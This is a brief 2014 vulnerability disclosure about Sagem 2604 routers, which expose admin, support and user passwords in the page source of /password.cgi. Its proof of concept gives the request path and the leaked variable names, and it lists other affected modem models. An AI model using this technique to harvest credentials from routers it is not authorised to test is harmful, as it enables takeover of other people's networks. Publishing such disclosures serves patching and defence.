facebook facebook twitter rss

Sagem 2604 Password Discolusre vulnerability

Author: TUNISIAN CYBER , Published: 06-06-2014
[+]Title: Sagem 2604 Password Discolusre vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 6/JUN/2014
[+]Type:WebApp
[+]Risk:High
[+]Affected Version: v2604
Hardware Version: 253251193
Software Version: 3.21a4G


[+]Overview:
Sagem modem suffers, from a password discolsure vulnerability.

[+]Proof Of Concept:
myrouter/(or)192.168.1.1/password.cgi
View Source
pwdAdmin = 'password';
pwdSupport = 'password';
pwdUser = 'password';

nmAdmin = 'username';
nmSupport = 'username';
nmUser = 'username';

http://i.imgur.com/2g55TRn.png

Other modems which suffers from this vuln.:
Comtrend CT 53XX
Sagem 2404

TUNISIAN CYBER-2014

Like us on Facebook :